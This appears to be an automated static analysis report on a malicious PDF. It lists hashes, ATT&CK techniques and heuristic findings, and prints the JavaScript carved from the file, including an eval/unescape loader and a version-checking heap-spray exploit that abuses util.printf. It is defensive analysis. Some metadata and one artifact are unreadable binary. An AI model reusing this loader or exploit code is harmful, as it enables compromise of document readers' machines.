Malicious PDF — malware analysis report

Static analysis result for SHA-256 d016d762b67d0504…

MALICIOUS

PDF

29.3 KB Created: zúîÉ$MSAÛû035WðC€ê\דe×õ6 Authoring application: £®–v024026P¯®E033«002 (via ¤³›qU#023˜¥N016°) First seen: 2026-05-08
MD5: 697bf94a5f108a0063dd90f3b9717aae SHA-1: 70e4b4826e39a455f27a7d91458dd9cfc15f738c SHA-256: d016d762b67d050412a4b12bbc4b18538720a353cf2875fe73c118e22b3db28f
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1566.001 Spearphishing Attachment T1027 Obfuscated Files or Information

The PDF file is encrypted and contains embedded JavaScript, indicating an attempt to obfuscate its true content and behavior. The presence of JavaScript actions and streams suggests the file is designed to execute code, likely to download and run a secondary payload. The high heuristic score for 'PDF_ENCRYPTED_WITH_JS' strongly supports this. The document body is unreadable, further emphasizing the reliance on script-based execution.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 5

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Encrypted PDF carries /JavaScript — payload hidden from static analysis high PDF_ENCRYPTED_WITH_JS
    PDF declares /Encrypt and also references an executable trigger (/JavaScript). Document encryption hides the JavaScript body and stream contents from static scanners — combined with auto-execution indicators this is a known evasion pattern used to deliver weaponised JavaScript that the analyst cannot inspect without the decryption key.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0017_000.js pdf-javascript-stream PDF /JS object 17 at offset 0x4130 137 bytes
SHA-256: a619e003b0cf2c4538f5778b5ed4f90df52cdbe3cc48663ee654e1335bf37150
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
eval(''+""+''+unescape(this.getField("main").value.replace(new RegExp("\\"+String.fromCharCode(124,65),"g"),String.fromCharCode(37))));
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x10E9 995 bytes
SHA-256: e5f36e76febd04ee78e485cb630e13b9adaebc56bc0c12a4b5b7fcac5dc2df4a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var vv = app.viewerVersion.toString().replace(/\D/g, "");
var vs = new Array();

vs[0] = vv.charAt(0)?vv.charAt(0):0;
vs[1] = vv.charAt(1)?vv.charAt(1):0;
vs[2] = vv.charAt(2)?vv.charAt(2):0;

var vva = (vs[0] < 7);
var vvb = (vs[0] == 7 && vs[1] < 1);
var vvc = (vs[0] == 8 && vs[1] <= 1 && vs[2] <= 2);

if(vva || vvb || vvc) {
var sccs = unescape(this.getField("code").value.replace(new RegExp("\\"+String.fromCharCode(124,65), "g"), String.fromCharCode(37)));

	var bgbl = unescape("%u0A0A"+"%u0A0A");
	var slspc = 20 + sccs.length;
	while(bgbl.length < slspc) bgbl += bgbl;
	var fblk = bgbl.substring(0,slspc);
	var blk = bgbl.substring(0,bgbl.length - slspc);
	while(blk.length + slspc < 0x60000) blk = blk + blk + fblk;

	var mmy = new Array();
	for(i = 0; i < 1200; i++){ mmy[i] = blk + sccs }

var nm = 12;
for(i=0;i<18;i++){ nm = nm + "9"; }
for(i=0;i<276;i++){ nm = nm + "8"; }

util.printf(unescape(""+"%"+"254%"+"35000f"), nm);
}

this.closeDoc(true);
javascript_obj0021_000.js pdf-javascript-stream PDF /JS object 21 at offset 0x17B0 137 bytes
SHA-256: 9925f431e95cd3ca78f20bafb796d0cf0a45419c9eb4c7b1c6a8853dfc84a600
Preview script
First 1,000 lines of the extracted script
E����[TĸJ$- *� , � �7�P�/����� ���j�^Sk �ȯ��zw#�
>�}�<�D�nO� B8�MR>����i� �I �i�S��9mZ��qߥ������ɉ�m� �{�Z�~*[Vw�S �^�Dc��� ڵ�吪�

Open this report in the interactive analyzer, or submit your own file for analysis.